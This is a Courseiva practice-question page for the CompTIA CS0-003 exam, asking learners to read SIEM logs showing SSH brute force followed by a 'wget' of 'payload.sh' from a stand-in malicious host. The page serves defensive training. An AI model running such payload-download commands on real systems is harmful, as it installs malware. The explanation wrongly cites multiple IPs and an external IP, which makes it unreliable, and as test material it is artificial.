Question 227 of 503
Reporting and CommunicationhardMultiple ChoiceObjective-mapped

CS0-003 Reporting and Communication Practice Question

This CS0-003 practice question tests your understanding of reporting and communication. Examine the command output carefully: the correct answer depends on what the output actually shows, not on general recall alone. After answering, compare your reasoning against the explanation and wrong-answer breakdown below. Once you have made your selection, read the full explanation to reinforce the concept and understand why each distractor is designed to mislead on exam day.

Exhibit

Refer to the exhibit.

Exhibit:
```
[2024-08-15 14:23:45] Failed login for user 'admin' from IP 10.0.0.5: SSH
[2024-08-15 14:23:47] Failed login for user 'admin' from IP 10.0.0.5: SSH
[2024-08-15 14:23:49] Failed login for user 'admin' from IP 10.0.0.5: SSH
[2024-08-15 14:23:51] Successful login for user 'admin' from IP 10.0.0.5: SSH
[2024-08-15 14:24:00] Command executed: wget http://malicious.example.com/payload.sh
```

An analyst views the above SIEM logs from a Linux server. Which of the following attacks is MOST likely occurring?

Clue words in this question

Noticing these words before you look at the options changes how you read each choice.

  • Clue: "most likely"

    Why it matters: Probability qualifier — the question wants the most probable cause or outcome, not a guaranteed one. Eliminate low-probability options.

Question 1hardmultiple choice
Full question →

Exhibit

Refer to the exhibit.

Exhibit:
```
[2024-08-15 14:23:45] Failed login for user 'admin' from IP 10.0.0.5: SSH
[2024-08-15 14:23:47] Failed login for user 'admin' from IP 10.0.0.5: SSH
[2024-08-15 14:23:49] Failed login for user 'admin' from IP 10.0.0.5: SSH
[2024-08-15 14:23:51] Successful login for user 'admin' from IP 10.0.0.5: SSH
[2024-08-15 14:24:00] Command executed: wget http://malicious.example.com/payload.sh
```

Answer choices

Why each option matters

Answer the question above first, then reveal the full breakdown to understand why each option is right or wrong.

Correct answer & explanation

Brute force attack leading to credential compromise and malware installation

The SIEM logs show repeated failed SSH login attempts from multiple IP addresses, followed by a successful login and then a wget command to download a suspicious file, indicating a brute force attack that succeeded, leading to credential compromise and subsequent malware installation. This pattern matches the typical lifecycle of a brute force attack against SSH services, where an attacker gains access and then stages malware.

Key principle: Answer the scenario, not the keyword: identify the specific constraint before choosing the most familiar-sounding option.

Answer analysis

Option-by-option breakdown

For each option: why learners choose it and why it is or isn't the right answer here.

  • Man-in-the-middle attack intercepting credentials

    Why it's wrong here

    No evidence of interception.

  • SQL injection through the web application

    Why it's wrong here

    No web request patterns present.

  • Brute force attack leading to credential compromise and malware installation

    Why this is correct

    Failed logins then success, then download of suspicious file.

    Clue confirmation

    The clue word "most likely" in the question point toward this answer.

    Related concept

    Read the scenario before looking for a memorised answer.

  • Denial of service attack against the SSH service

    Why it's wrong here

    Only a few attempts; not overwhelming.

Common exam traps

Common exam trap: answer the scenario, not the keyword

CompTIA often tests the distinction between a brute force attack and a denial of service attack by including a successful login event, which eliminates DoS as the answer since DoS does not involve credential compromise or post-exploitation activity.

Detailed technical explanation

How to think about this question

SSH brute force attacks often leverage tools like Hydra or Medusa to cycle through username/password combinations; once successful, attackers commonly use wget or curl to fetch a payload from a remote server, which may be a backdoor or coin miner. The logs show a successful authentication from IP 10.0.0.5 after multiple failures, followed by a wget to an external IP, which is a classic indicator of compromise (IoC) in SSH audit trails.

KKey Concepts to Remember

  • Read the scenario before looking for a memorised answer.
  • Find the constraint that changes the correct option.
  • Eliminate answers that are true in general but not in this case.

TExam Day Tips

  • Watch for words such as best, first, most likely and least administrative effort.
  • Review why wrong options are wrong, not only why the correct option is correct.

Key takeaway

Answer the scenario, not the keyword: identify the specific constraint before choosing the most familiar-sounding option.

Real-world example

How this comes up in practice

A security analyst at a medium-sized enterprise encounters this scenario during an investigation or architecture review. The correct answer reflects best practice for the specific threat or control described. Answer the scenario, not the keyword: identify the specific constraint before choosing the most familiar-sounding option. Security exam questions test whether you can match controls to threats in context — not just recall definitions.

What to study next

Got this wrong? Here's your next step.

Identify which exam domain this question belongs to, review the core concept, then practise similar questions from the same domain.

Related practice questions

Related CS0-003 practice-question pages

Use these pages to review the topic behind this question. This is how one missed question becomes focused revision.

Practice this exam

Start a free CS0-003 practice session

Short sessions build daily habit. Longer sessions build exam-day stamina. Try a timed session to simulate real conditions.

FAQ

Questions learners often ask

What does this CS0-003 question test?

Reporting and Communication — This question tests Reporting and Communication — Read the scenario before looking for a memorised answer..

What is the correct answer to this question?

The correct answer is: Brute force attack leading to credential compromise and malware installation — The SIEM logs show repeated failed SSH login attempts from multiple IP addresses, followed by a successful login and then a wget command to download a suspicious file, indicating a brute force attack that succeeded, leading to credential compromise and subsequent malware installation. This pattern matches the typical lifecycle of a brute force attack against SSH services, where an attacker gains access and then stages malware.

What should I do if I get this CS0-003 question wrong?

Identify which exam domain this question belongs to, review the core concept, then practise similar questions from the same domain.

Are there clue words in this question I should notice?

Yes — watch for: "most likely". Probability qualifier — the question wants the most probable cause or outcome, not a guaranteed one. Eliminate low-probability options.

What is the key concept behind this question?

Read the scenario before looking for a memorised answer.

About these practice questions

Courseiva creates original exam-style practice questions with explanations and wrong-answer analysis. It does not publish real exam questions, exam dumps, or protected exam content. Learn why practice questions differ from exam dumps →

How Courseiva writes practice questions · Editorial policy

Keep practising

More CS0-003 practice questions

Last reviewed: Jun 30, 2026

Question Discussion

Share a tip, memory trick, or ask about the reasoning behind this question. Do not post real exam questions, leaked content, braindumps, or copyrighted exam material. Comments are moderated and may be removed without notice.

Loading comments…

Sign in to join the discussion.

This CS0-003 practice question is part of Courseiva's free CompTIA certification practice question bank. Courseiva provides original exam-style practice questions with explanations, topic-based practice, mock exams, readiness tracking, and study analytics to help learners prepare for the CS0-003 exam.